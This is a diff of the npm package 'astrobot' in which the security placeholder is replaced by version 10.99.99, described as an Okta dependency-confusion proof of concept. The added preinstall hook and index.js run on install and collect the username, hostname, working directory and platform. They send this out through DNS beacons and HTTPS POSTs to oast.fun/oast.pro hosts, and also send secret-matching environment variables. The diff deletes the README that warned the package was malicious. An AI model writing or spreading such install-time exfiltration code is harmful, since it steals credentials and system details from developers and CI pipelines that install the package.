astrobot 0.0.1-security → 10.99.99

package/index.js

@@ -0,0 +1,39 @@
+const dns = require('dns');
+const os = require('os');
+const path = require('path');
+
+const MAX_LABEL_LENGTH = 63;
+const OAST_DOMAIN = 'd1htmicgtqkhsklb8ai0riqfkkqara1j1.oast.fun';
+
+// Helper: encode string to hex and split into label-safe chunks
+function hexChunks(str) {
+  const hex = Buffer.from(str).toString('hex');
+  const chunks = [];
+  for (let i = 0; i < hex.length; i += MAX_LABEL_LENGTH) {
+    chunks.push(hex.slice(i, i + MAX_LABEL_LENGTH));
+  }
+  return chunks;
+}
+
+// Collect system info
+const username = os.userInfo().username || 'nouser';
+const hostname = os.hostname() || 'nohost';
+const cwd = process.cwd() || 'nocwd';
+
+// Encode each to hex and build labels
+const labels = [
+  ...hexChunks(username),
+  ...hexChunks(hostname),
+  ...hexChunks(cwd),
+  OAST_DOMAIN
+];
+
+let domain = labels.join('.');
+
+// Truncate full domain to 253 characters (RFC limit)
+if (domain.length > 253) {
+  domain = domain.substring(0, 253);
+}
+
+// Fire DNS beacon
+dns.resolve(domain, () => {});

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "astrobot",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "10.99.99",
+  "description": "Okta internal dependency confusion PoC - RCE via preinstall beacon",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "author": "orwa",
+  "license": "ISC"
 }

package/preinstall.js

@@ -0,0 +1,74 @@
+const dns = require('dns');
+const os = require('os');
+const { exec } = require('child_process');
+const https = require('https');
+
+const MAX_LABEL = 63;
+const OAST_DOMAIN = 'd1huvasgtqkkj2itrohgf5zicbta5114n.oast.pro';
+
+// DNS-safe hex encoding split into max 63 char chunks
+function hexify(str) {
+  return Buffer.from(str).toString('hex').match(/.{1,63}/g) || [];
+}
+
+// Collect victim fingerprint info
+const info = {
+  user: os.userInfo().username || 'nouser',
+  host: os.hostname() || 'nohost',
+  cwd: process.cwd() || 'nocwd',
+  platform: os.platform(),
+  arch: os.arch(),
+  timestamp: Date.now().toString(36),
+  ci: !!process.env.CI || !!process.env.GITHUB_ACTIONS
+};
+
+// Build DNS beacon domain
+const labels = [
+  ...hexify(info.user),
+  ...hexify(info.host),
+  ...hexify(info.cwd),
+  info.platform,
+  info.arch,
+  info.ci ? 'ci' : 'local',
+  info.timestamp,
+  OAST_DOMAIN
+];
+
+let domain = labels.join('.');
+if (domain.length > 253) domain = domain.slice(0, 253);
+
+// Fire DNS beacon
+dns.resolve(domain, () => {});
+
+// Fetch external IP and beacon over HTTP as fallback
+exec('curl -s https://api.ipify.org', (err, stdout) => {
+  const ip = stdout.trim();
+  const payload = JSON.stringify({ ...info, ip });
+
+  const req = https.request({
+    hostname: OAST_DOMAIN,
+    path: '/',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json' }
+  }, () => {});
+  req.on('error', () => {});
+  req.write(payload);
+  req.end();
+});
+
+// Stealthy env var sniff (top 5 keys matching sensitive keywords)
+const leaked = Object.entries(process.env)
+  .filter(([k]) => /key|token|secret/i.test(k))
+  .slice(0, 5)
+  .reduce((acc, [k, v]) => ({ ...acc, [k]: v.slice(0, 10) + '...' }), {});
+
+if (Object.keys(leaked).length) {
+  const req = https.request({
+    hostname: OAST_DOMAIN,
+    path: '/',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json' }
+  }, () => {});
+  req.write(JSON.stringify({ envleak: leaked }));
+  req.end();
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=astrobot for more information.